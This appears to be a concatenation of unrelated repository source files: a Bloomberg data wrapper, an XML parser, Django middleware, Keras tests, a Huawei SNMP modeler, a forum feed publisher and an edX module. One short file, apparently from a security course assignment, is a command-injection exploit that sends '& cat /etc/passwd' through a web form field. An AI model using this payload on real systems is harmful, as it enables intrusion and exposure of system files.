for j in range(0, element.numElements()):
subelement = element.getElement(j)
name = str(subelement.name())
results[name] = _dict_from_element(subelement)
return results
class Observer(object):
__metaclass__ = ABCMeta
@abstractmethod
def update(self, *args, **kwargs):
pass
class HistoryWatcher(Observer):
"""Object to stream and record history data from Bloomberg.
"""
def __init__(self):
self.outputDC = {}
def update(self, *args, **kwargs):
if kwargs['field'] != 'ALL':
self.outputDC[(kwargs['security'], kwargs['field'])] = kwargs['data'][
[kwargs['field']]] # double brackets keep it a dataframe, not a series
def simpleReferenceDataRequest(id_to_ticker_dic, fields):
'''
Common use case for reference data request
id_to_ticker_dic: dictionnary with user id mapped to Bloomberg security ticker e.g. {'Apple':'AAPL US Equity'}
Returns a dataframe indexed by the user id, with columns equal to fields
'''
ticker_to_id_dic = {v: k for k, v in id_to_ticker_dic.items()}
blpts = BLPTS(id_to_ticker_dic.values(), fields)
blpts.get()
blpts.closeSession()
blpts.output['id'] = blpts.output.index
blpts.output['id'].replace(ticker_to_id_dic, inplace=True)
blpts.output.set_index('id', inplace=True)
return blpts.output.copy()
def simpleHistoryRequest(securities=[], fields=[], startDate=datetime.datetime(2015, 1, 1),
endDate=datetime.datetime(2016, 1, 1), periodicity='DAILY'):
'''
Convenience function to retrieve historical data for a list of securities and fields
As returned data can have different length, missing data will be replaced with pandas.np.nan (note it's already taken care of in one security several fields)
If multiple securities and fields, a MultiIndex dataframe will be returned.
'''
blpts = BLPTS(securities, fields, startDate=startDate, endDate=endDate, periodicity=periodicity)
historyWatcher = HistoryWatcher()
blpts.register(historyWatcher)
blpts.get()
blpts.closeSession()
for key, df in historyWatcher.outputDC.items():
df.columns = [key]
output = pandas.concat(historyWatcher.outputDC.values(), axis=1)
output.columns = pandas.MultiIndex.from_tuples(output.columns)
output.columns.names = ['Security', 'Field']
return output
################################################
# Examples below#################################
################################################
def excelEmulationExample():
##Examples of the Request/Response Paradigm
bloomberg = BLP()
print(bloomberg.bdp())
print('')
print(bloomberg.bdp('US900123AL40 Govt', 'YLD_YTM_BID', 'PX_BID', '200'))
print('')
print(bloomberg.bdh())
print('')
print(bloomberg.bdhOHLC())
bloomberg.closeSession()
class ObserverStreamExample(Observer):
def update(self, *args, **kwargs):
output = kwargs['time'].strftime("%Y-%m-%d %H:%M:%S") + ' received ' + kwargs['security'] + ' ' + kwargs[
'field'] + '=' + str(kwargs['data'])
output = output + '. CorrID ' + str(kwargs['corrID']) + ' bbgTime ' + kwargs['bbgTime']
print(output)
def streamPatternExample():
stream = BLPStream('ESZ7 Index', ['BID', 'ASK'], 0, 1)
# stream=BLPStream('XS1151974877 CORP',['BID','ASK'],0,1) #Note that for a bond only BID gets updated even if ASK moves.
obs = ObserverStreamExample()
stream.register(obs)
stream.start()
class ObserverRequestExample(Observer):
def update(self, *args, **kwargs):
if kwargs['field'] == 'ALL':
print(kwargs['security'])
print(kwargs['data'])
def BLPTSExample():
result = BLPTS(['XS0316524130 Corp', 'US900123CG37 Corp'], ['PX_BID', 'INT_ACC', 'DAYS_TO_NEXT_COUPON'])
result.get()
print(result.output)
result.closeSession()
#############################################################################
def main():
BLPTSExample()
if __name__ == '__main__':
BLPTSExample()
simpleHistoryRequest("AAPL")
|
ahwmrklas/warpWarp
|
refs/heads/master
|
test/XML2Py.py
|
1
|
'''
XML2Py - XML to Python de-serialization
This code transforms an XML document into a Python data structure
Usage:
deserializer = XML2Py()
python_object = deserializer.parse( xml_string )
print xml_string
print python_object
'''
from lxml import etree
class XML2Py():
def __init__( self ):
self._parser = parser = etree.XMLParser( remove_blank_text=True )
self._root = None # root of etree structure
self.data = None # where we store the processed Python structure
def parse( self, xmlString ):
'''
processes XML string into Python data structure
'''
self._root = etree.fromstring( xmlString, self._parser )
self.data = self._parseXMLRoot()
return self.data
def tostring( self ):
'''
creates a string representation using our etree object
'''
if self._root != None:
return etree.tostring( self._root )
def _parseXMLRoot( self ):
'''
starts processing, takes care of first level idisyncrasies
'''
childDict = self._parseXMLNode( self._root )
return { self._root.tag : childDict["children"] }
def _parseXMLNode( self, element ):
'''
rest of the processing
'''
childContainer = None # either Dict or List
# process any tag attributes
# if we have attributes then the child container is a Dict
# otherwise a List
if element.items():
childContainer = {}
childContainer.update( dict( element.items() ) )
else:
childContainer = []
if isinstance( childContainer, list ) and element.text:
# tag with no attributes and one that contains text
childContainer.append( element.text )
else:
# tag might have children, let's process them
for child_elem in element.getchildren():
childDict = self._parseXMLNode( child_elem )
# let's store our child based on container type
#
if isinstance( childContainer, dict ):
# these children are lone tag entities ( eg, 'copyright' )
childContainer.update( { childDict["tag"] : childDict["children"] } )
else:
# these children are repeated tag entities ( eg, 'format' )
childContainer.append( childDict["children"] )
return { "tag":element.tag, "children": childContainer }
def main():
xml_string = '''
<documents>
<document date="June 6, 2009" title="The Newness of Python" author="John Doe">
<copyright type="CC" url="http://www.creativecommons.org/" date="June 24, 2009" />
<text>Python is very nice. Very, very nice.</text>
<formats>
<format type="pdf">
<info uri="http://www.python.org/newness-of-python.pdf" pages="245" />
</format>
<format type="web">
<info uri="http://www.python.org/newness-of-python.html" />
</format>
</formats>
</document>
</documents>
'''
deserializer = XML2Py()
python_object = deserializer.parse( xml_string )
print(xml_string)
print(python_object)
if __name__ == '__main__':
main()
|
sleepers-anonymous/zscore
|
refs/heads/master
|
sleep/middleware.py
|
1
|
from django.utils import timezone
from models import SleeperProfile, Sleeper
import pytz
class TimezoneMiddleware(object):
def process_request(self,request):
if request.user.is_authenticated():
tz = pytz.timezone(request.user.sleeperprofile.timezone)
timezone.activate(tz)
|
Cadene/keras
|
refs/heads/master
|
tests/auto/test_sequential_model.py
|
33
|
from __future__ import absolute_import
from __future__ import print_function
import unittest
import numpy as np
np.random.seed(1337)
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Merge
from keras.utils import np_utils
from keras.utils.test_utils import get_test_data
input_dim = 32
nb_hidden = 16
nb_class = 4
batch_size = 64
nb_epoch = 1
train_samples = 5000
test_samples = 1000
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples, nb_test=test_samples, input_shape=(input_dim,),
classification=True, nb_class=4)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
print(X_train.shape)
print(y_train.shape)
class TestSequential(unittest.TestCase):
def test_sequential(self):
print('Test sequential')
model = Sequential()
model.add(Dense(input_dim, nb_hidden))
model.add(Activation('relu'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=2, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=2, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=1, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, shuffle=False)
model.train_on_batch(X_train[:32], y_train[:32])
loss = model.evaluate(X_train, y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict(X_test, verbose=0)
classes = model.predict_classes(X_test, verbose=0)
probas = model.predict_proba(X_test, verbose=0)
print(model.get_config(verbose=1))
print('test weight saving')
model.save_weights('temp.h5', overwrite=True)
model = Sequential()
model.add(Dense(input_dim, nb_hidden))
model.add(Activation('relu'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.load_weights('temp.h5')
nloss = model.evaluate(X_train, y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_sum(self):
print('Test merge: sum')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0, shuffle=False)
loss = model.evaluate([X_train, X_train], y_train, verbose=0)
print('loss:', loss)
if loss > 0.7:
raise Exception('Score too low, learning issue.')
preds = model.predict([X_test, X_test], verbose=0)
classes = model.predict_classes([X_test, X_test], verbose=0)
probas = model.predict_proba([X_test, X_test], verbose=0)
print(model.get_config(verbose=1))
print('test weight saving')
model.save_weights('temp.h5', overwrite=True)
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.load_weights('temp.h5')
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
nloss = model.evaluate([X_train, X_train], y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_concat(self):
print('Test merge: concat')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='concat'))
model.add(Dense(nb_hidden * 2, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_data=([X_test, X_test], y_test))
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_split=0.1)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit([X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0, shuffle=False)
loss = model.evaluate([X_train, X_train], y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict([X_test, X_test], verbose=0)
classes = model.predict_classes([X_test, X_test], verbose=0)
probas = model.predict_proba([X_test, X_test], verbose=0)
print(model.get_config(verbose=1))
print('test weight saving')
model.save_weights('temp.h5', overwrite=True)
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='concat'))
model.add(Dense(nb_hidden * 2, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.load_weights('temp.h5')
nloss = model.evaluate([X_train, X_train], y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_recursivity(self):
print('Test merge recursivity')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(input_dim, nb_hidden))
right.add(Activation('relu'))
righter = Sequential()
righter.add(Dense(input_dim, nb_hidden))
righter.add(Activation('relu'))
intermediate = Sequential()
intermediate.add(Merge([left, right], mode='sum'))
intermediate.add(Dense(nb_hidden, nb_hidden))
intermediate.add(Activation('relu'))
model = Sequential()
model.add(Merge([intermediate, righter], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_data=([X_test, X_test, X_test], y_test))
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_data=([X_test, X_test, X_test], y_test))
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=0, validation_split=0.1)
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=0, validation_split=0.1)
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit([X_train, X_train, X_train], y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0, shuffle=False)
loss = model.evaluate([X_train, X_train, X_train], y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict([X_test, X_test, X_test], verbose=0)
classes = model.predict_classes([X_test, X_test, X_test], verbose=0)
probas = model.predict_proba([X_test, X_test, X_test], verbose=0)
print(model.get_config(verbose=1))
model.save_weights('temp.h5', overwrite=True)
model.load_weights('temp.h5')
nloss = model.evaluate([X_train, X_train, X_train], y_train, verbose=0)
print(nloss)
assert(loss == nloss)
def test_merge_overlap(self):
print('Test merge overlap')
left = Sequential()
left.add(Dense(input_dim, nb_hidden))
left.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, left], mode='sum'))
model.add(Dense(nb_hidden, nb_class))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=2, validation_data=(X_test, y_test))
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=2, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=False, verbose=1, validation_split=0.1)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=0)
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, shuffle=False)
model.train_on_batch(X_train[:32], y_train[:32])
loss = model.evaluate(X_train, y_train, verbose=0)
print('loss:', loss)
if loss > 0.6:
raise Exception('Score too low, learning issue.')
preds = model.predict(X_test, verbose=0)
classes = model.predict_classes(X_test, verbose=0)
probas = model.predict_proba(X_test, verbose=0)
print(model.get_config(verbose=1))
model.save_weights('temp.h5', overwrite=True)
model.load_weights('temp.h5')
nloss = model.evaluate(X_train, y_train, verbose=0)
print(nloss)
assert(loss == nloss)
if __name__ == '__main__':
print('Test Sequential model')
unittest.main()
|
vhazali/cs5331
|
refs/heads/master
|
assignment2/scripts/exploit08/exploit08.py
|
1
|
import urllib, urllib2, webbrowser
url = 'http://www.wsb.com/Assignment2/case08.php'
values = dict(ip_url = '& cat /etc/passwd')
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
rsp = urllib2.urlopen(req)
with open('results.html', 'w') as f:
f.write(rsp.read())
new = 2
webbrowser.open('results.html', new=new)
|
nclisg/ZenPacks.community.HuaweiWireless
|
refs/heads/master
|
ZenPacks/community/HuaweiWireless/modeler/plugins/community/snmp/HuaweiAccessControllerMap.py
|
2
|
from Products.DataCollector.plugins.CollectorPlugin import (SnmpPlugin, GetTableMap, GetMap)
from Products.DataCollector.plugins.DataMaps import ObjectMap, RelationshipMap, MultiArgs
#Lookup table for AP Status
STATUSNAME = {
1 : 'idle',
2 : 'autofind',
3 : 'typeNotMatch',
4 : 'fault',
5 : 'config',
6 : 'configFailed',
7 : 'download',
8 : 'normal',
9: 'commiting',
10 : 'commitFailed',
11 : 'standby',
12: 'vermismatch'
}
#Lookup table for AP Region Deploy modes
DEPLOYMODES = {
1 : 'Discrete',
2 : 'Normal',
3 : 'Dense'
}
class HuaweiAccessControllerMap(SnmpPlugin):
#Pull SNMP data from controllers
snmpGetTableMaps = (
GetTableMap(
'hwApRegionTable', '1.3.6.1.4.1.2011.6.139.2.5.1.1', {
'.2':'hwApRegionName',
'.3':'hwApRegionDeployMode',
'.4':'hwApRegionApNumber',
}
),
GetTableMap(
'hwApObjectsTable', '1.3.6.1.4.1.2011.6.139.2.6.1.1', {
'.2':'hwApUsedType',
'.4':'hwApUsedRegionIndex',
'.5':'hwApMac',
'.6':'hwApSn',
'.7':'hwApSysName',
'.8':'hwApRunState',
'.9':'hwApSoftwareVersion',
'.15':'hwApIpAddress',
'.20':'hwApRunTime',
}
),
GetTableMap(
'hwApLldpTable', '1.3.6.1.4.1.2011.6.139.2.6.14.1', {
'.6':'hwApLldpRemPortId',
'.8':'hwApLldpRemSysName',
}
)
)
snmpGetMap = GetMap({
'.1.3.6.1.2.1.47.1.1.1.1.11.9':'entPhysicalSerialNum',
'.1.3.6.1.2.1.47.1.1.1.1.10.3':'entPhysicalSoftwareRev',
'.1.3.6.1.4.1.2011.6.139.1.2.5.0':'hwWlanAcAccessMaxApNumber',
})
def process(self, device, results, log):
log.info('processing %s for device %s', self.name(), device.id)
maps = []
regionmap = []
regionnames = []
getdata, tabledata = results
acc_points = tabledata.get('hwApObjectsTable', {})
lldp = tabledata.get('hwApLldpTable', {})
regions = tabledata.get('hwApRegionTable', {})
# AP Region Component
for snmpindex, row in regions.items():
name = row.get('hwApRegionName')
if not name:
log.warn('Skipping region with no name')
continue
regionnames.append(name)
regionmap.append(ObjectMap({
'id': self.prepId(name),
'title': name,
'snmpindex': snmpindex.strip('.'),
'regiondeploymode': DEPLOYMODES.get(row.get('hwApRegionDeployMode'), 'Unknown'),
'regionapnumber': row.get('hwApRegionApNumber'),
}))
# Access Point Component
for region in regionnames:
apmap = []
for snmpindex, row in acc_points.items():
neighbour = ""
neighport = ""
name = row.get('hwApSysName')
regionrow = regions.get('.' + str(row.get('hwApUsedRegionIndex'))),
apregion = regionrow[0].get('hwApRegionName'),
if not name:
log.warn('Skipping access point with no name')
continue
if region == apregion[0]:
apneighbour = lldp.get(snmpindex + '.200.1')
if apneighbour is not None:
neighbour = apneighbour.get('hwApLldpRemSysName')
neighport = apneighbour.get('hwApLldpRemPortId')
apmap.append(ObjectMap({
'id': self.prepId(name),
'title': name,
'snmpindex': snmpindex.strip('.'),
'apip': row.get('hwApIpAddress'),
'apmac': self.asmac(row.get('hwApMac')),
'apserial': row.get('hwApSn'),
'apmodel': row.get('hwApUsedType'),
'apstatus': STATUSNAME.get(row.get('hwApRunState'), 'Unknown'),
'apregion': apregion,
'apsoftwareversion': row.get('hwApSoftwareVersion'),
'apneighbourname' : neighbour,
'apneighbourport' : neighport,
}))
maps.append(RelationshipMap(
compname='huaweiAPRegions/%s' % region,
relname='huaweiAccessPoints',
modname='ZenPacks.community.HuaweiWireless.HuaweiAccessPoint',
objmaps=apmap))
# Map main device details
maps.append(ObjectMap(
modname='ZenPacks.community.HuaweiWireless.HuaweiControllerDevice',
data={
'setHWSerialNumber': getdata.get('entPhysicalSerialNum'),
'setOSProductKey': MultiArgs(getdata.get('entPhysicalSoftwareRev'), 'HUAWEI Technology Co.,Ltd'),
'controller_maxap': getdata.get('hwWlanAcAccessMaxApNumber'),
}))
# Map AP Region components
maps.append(RelationshipMap(
relname='huaweiAPRegions',
modname='ZenPacks.community.HuaweiWireless.HuaweiAPRegion',
objmaps=regionmap))
return maps
|
unix-beard/newsbot
|
refs/heads/master
|
server/modules/feedpublish/feedpublish.py
|
2
|
#-*- coding: utf-8 -*-
__name__ = 'publisher'
import feedparser
import operator
import time
import datetime
import sys
import atexit
import hashlib
import sqlite3
import sqlitebck
import loggerfactory
import threading
import Queue
import multiprocessing
import os
import ConfigParser
from forumlogger import *
from multiprocessing import current_process
from threading import current_thread
from response import Response, ResponseStatus
log = None
dbConnection = None
cursor = None
stopRequest = threading.Event()
class StopThreadException(Exception):
""" To exit from publishForever """
pass
class NewsItem:
""" Abstraction around forum news item """
def __init__(self, title, body, url):
self.title = title
self.body = body
self.url = url
def __unicode__(self):
return u'[b]{0}[/b]\n[quote]{1}\n[url={2}]link[/url][/quote]\n'.format(self.title, self.body, self.url)
def __str__(self):
return unicode(self).encode('utf-8')
def fetchItems():
""" Get all news items from DB that need to be publised """
cursor.execute("SELECT hash, title, description, link FROM feed WHERE published = 0 ORDER BY link")
rows = cursor.fetchall()
newsItems = []
for row in rows:
newsItems.append(NewsItem(row[1], row[2], row[3]))
return rows, newsItems
def setAsPublished(rows):
""" Mark each item as published, so we don't have to publish it again """
for row in rows:
cursor.execute('UPDATE feed SET published = 1 where hash = ? and published = 0', (row[0],))
dbConnection.commit()
def nextTime(times):
""" Get the next time to sleep until before we start publishing """
# currentTime is local
currentTime = datetime.datetime.now().time()
nextPublishTime = None
dayCount = 0
log.info('Determining the next publish time in {0}'.format(times))
for t in times:
if currentTime < t:
log.info('Current time is less than {0}'.format(t))
nextPublishTime = t
break
if nextPublishTime is None:
dayCount = 1
nextPublishTime = times[0] if times else datetime.time(14, 55, 0)
d = datetime.datetime.today().date() + datetime.timedelta(days=dayCount)
return datetime.datetime.combine(d, nextPublishTime)
def sleepUntilWokenUp(interruptRequest, times):
""" Sleep until this time is up or stop request is recieved """
dt = nextTime(times)
log.info('{0} Next publish datetime: [{1}]'.format(current_thread().name, dt))
while dt >= datetime.datetime.today() and not interruptRequest.isSet():
interruptRequest.wait(1)
log.info('{0} is awake'.format(current_thread().name))
def backup(dbFile, dbBackupDir):
#################################################################################
# TODO:
#################################################################################
# 1. Check for ending '/'
# 2. Handle possible errors/exceptions from:
# a. sqlite3.connect
# b. sqlitebck.copy
#################################################################################
log.info('{0} Backing up DB file [{1}] to [{2}]'.format(current_thread().name, dbFile, dbBackupDir))
dbCopyConnection = sqlite3.connect(dbBackupDir + os.path.split(dbFile)[1])
sqlitebck.copy(dbConnection, dbCopyConnection)
log.info('{0} ... OK'.format(current_thread().name))
def publishForever(queue, interruptRequest, times, submitType, dbFile, dbBackupDir):
""" Sleep, check for items to publish, sleep again """
params = None
log.info('{0} started'.format(current_thread().name))
log.info('{0} ... publish time: [{1}]'.format(current_thread().name, times))
log.info('{0} ... submit type: [{1}]'.format(current_thread().name, submitType))
log.info('{0} ... database file:[{1}]'.format(current_thread().name, dbFile))
def stopCommandHandler(params):
raise StopThreadException('{0} requested to stop'.format(current_thread().name))
def setCommandHandler(params):
log.info('{0} There is a set request ({1})'.format(current_thread().name, params))
if params['time']:
times = params['time']
log.info('{0} New times: {1}'.format(current_thread().name, times))
if params['submit_type']:
submitType = params['submit_type']
log.info('{0} New submit type: {1}'.format(current_thread().name, submitType))
interruptRequest.clear()
return (times, submitType)
dispatch = {'stop': stopCommandHandler, 'set' : setCommandHandler}
try:
global dbConnection, cursor
dbConnection = sqlite3.connect(dbFile)
cursor = dbConnection.cursor()
while True:
while not interruptRequest.isSet():
sleepUntilWokenUp(interruptRequest, times)
if interruptRequest.isSet():
break
log.info('{0} Fetching fresh items'.format(current_thread().name))
(rows, items) = fetchItems()
log.info('{0} ... OK. Fetched {1} items'.format(current_thread().name, len(items)))
# If there is nothing to publish, got back to sleep
if not items:
log.info('{0} Nothing to submit'.format(current_thread().name))
continue
log.info(u'{0} {1}'.format(current_thread().name, u''.join([unicode(i) for i in items])))
try:
fl = ForumLogger(interruptRequest, log, dbFile)
if fl.loginToForum():
fl.submit(items, submitType)
setAsPublished(rows)
backup(dbFile, dbBackupDir)
else:
log.error("{0} Can't login".format(current_thread().name))
except Exception as ex:
log.exception(u'{0} {1}'.format(current_thread().name, repr(ex)))
log.info('{0} interrupted. Waiting for command'.format(current_thread().name))
(command, params) = queue.get()
log.info('{0} ... Recieved command [{1}]'.format(current_thread().name, command))
(times, submitType) = dispatch[command](params)
log.info('submitType {0}'.format(submitType))
log.info('times {0}'.format(times))
except StopThreadException as ex:
# We were requested to stop
log.info(repr(ex))
except Exception as ex:
log.exception(repr(ex))
def validateTime(rawStrTimes):
"""
Traverse the list of string times and convert them to python datetime.time objects.
E.g., ["09:00:00", "10:01:02", "22:15:30"] will be converted to
[datetime.time(9, 0), datetime.time(10,1,2), datetime.time(22,15,30)] respectively
"""
pyTimes = []
for t in rawStrTimes:
try:
pyTimes.append(datetime.datetime.strptime(t, "%H:%M:%S").time())
except ValueError as err:
log.warning('{0} validateTime - Can\'t convert "{1}". Skipping'.format(current_process().name, t))
# Sort times in ascending order
sorted(pyTimes)
return pyTimes
def validateSubmitType(submitType):
if submitType == 'post' or submitType == 'preview':
return submitType
else:
log.warning('{0} validateSubmitType - Unknown submit type "{1}". Skipping'.format(current_process().name, submitType))
return None
def readConfigFile(configFile, section, options=None):
logs = [('info', 'Reading config file [{0}]'.format(configFile))]
config = ConfigParser.ConfigParser()
if not config.read(configFile):
logs.append(('warning', 'Can\'t read config file'))
return (options, logs)
if section not in config.sections():
logs.append(('warning', 'Section [{0}] not found. Will use defaults'.format(section)))
return (options, logs)
for op in options:
if config.has_option(section, op):
if op == 'time':
options[op] = [t.strip() for t in config.get(section, op).split(',')]
else:
options[op] = config.get(section, op)
return (options, logs)
def getStartParams(params):
startParams = {
'db_file': '/tmp/feeds.db',
'log_file': '/tmp/publish1.log',
'time': ["14:55:00"],
'submit_type': 'post',
'db_backup_dir': '/home/shvonder/Dropbox/'
}
(startParams, logs) = readConfigFile(params['module_ini'], __name__.upper(), startParams)
global log
log = loggerfactory.createLogger(__name__, startParams['log_file'])
logDispatch = {
'info': lambda l, s: l.info(s),
'debug': lambda l, s: l.debug(s),
'warning': lambda l, s: l.warning(s),
'error': lambda l, s: l.error(s)
}
for l in logs:
logDispatch[l[0]](log, l[1])
log.info(startParams)
return (startParams['db_file'], startParams['db_backup_dir'], validateTime(startParams['time']), startParams['submit_type'])
def stopCommandHandler(interruptRequest, commandQueue, params):
""" Handle 'stop' command """
log.info('{0} Handling [stop] command'.format(current_process().name))
interruptRequest.set()
commandQueue.put(('stop', None))
stopRequest.set()
log.info('{0} ... OK'.format(current_process().name))
def setCommandHandler(interruptRequest, commandQueue, params):
""" Hanlde 'set' command """
log.info('{0} Handling [set] command'.format(current_process().name))
newParams = {'time' : [], 'submit_type' : None}
if 'time' in params:
newParams['time'] = validateTime(params['time'])
if 'submit_type' in params:
newParams['submit_type'] = validateSubmitType(params['submit_type'])
interruptRequest.set()
commandQueue.put(('set', newParams))
log.info('{0} ... OK'.format(current_process().name))
def run(queue, params):
""" Start a publisher thread to publish forever """
try:
(dbFile, dbBackupDir, times, submitType) = getStartParams(params)
log.info('{0} started'.format(current_process().name))
commandQueue = Queue.Queue()
interruptRequest = threading.Event()
publishThread = threading.Thread(target=publishForever,
args=(commandQueue, interruptRequest, times, submitType, dbFile, dbBackupDir),
name="PublishThread")
publishThread.start()
dispatch = {'stop' : stopCommandHandler, 'set' : setCommandHandler}
while not stopRequest.isSet():
(command, params) = queue.get()
log.info('{0} recieved command: [{1}]'.format(current_process().name, str(command)))
try:
dispatch[command](interruptRequest, commandQueue, params)
queue.put(Response())
except Exception as ex:
queue.put(Response(message=str(ex), status=ResponseStatus.ERROR))
log.info('{0} Waiting for {1} to stop'.format(current_process().name, publishThread.name))
publishThread.join()
log.info('{0} ... OK'.format(current_process().name))
except Exception as ex:
log.exception(repr(ex))
log.info('{0} terminated'.format(__name__))
|
edxzw/edx-platform
|
refs/heads/master
|
common/lib/xmodule/xmodule/imageannotation_module.py
|
14
|
"""
Module for Image annotations using annotator.
"""
from lxml import etree
from pkg_resources import resource_string
from xmodule.x_module import XModule
from xmodule.raw_module import RawDescriptor
from xblock.core import Scope, String
from xmodule.annotator_mixin import get_instructions, html_to_text
from xmodule.annotator_token import retrieve_token
from xblock.fragment import Fragment
import textwrap
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
class AnnotatableFields(object):
""" Fields for `ImageModule` and `ImageDescriptor`. """
data = String(
help=_("XML data for the annotation"),
scope=Scope.content,
default=textwrap.dedent("""\
<annotatable>
<instructions>
<p>
Add the instructions to the assignment here.
</p>
</instructions>
<p>
Lorem ipsum dolor sit amet, at amet animal petentium nec. Id augue nemore postulant mea. Ex eam dicant noluisse expetenda, alia admodum abhorreant qui et. An ceteros expetenda mea, tale natum ipsum quo no, ut pro paulo alienum noluisse.
</p>
<json>
navigatorSizeRatio: 0.25,
wrapHorizontal: false,
showNavigator: true,
navigatorPosition: "BOTTOM_LEFT",
showNavigationControl: true,
tileSources: [{"profile": "http://library.stanford.edu/iiif/image-api/1.1/compliance.html#level2", "scale_factors": [1, 2, 4, 8, 16, 32, 64], "tile_height": 1024, "height": 3466, "width": 113793, "tile_width": 1024, "qualities": ["native", "bitonal", "grey", "color"], "formats": ["jpg", "png", "gif"], "@context": "http://library.stanford.edu/iiif/image-api/1.1/context.json", "@id": "http://54.187.32.48/loris/suzhou_orig.jp2"}],
</json>
</annotatable>
"""))
display_name = String(
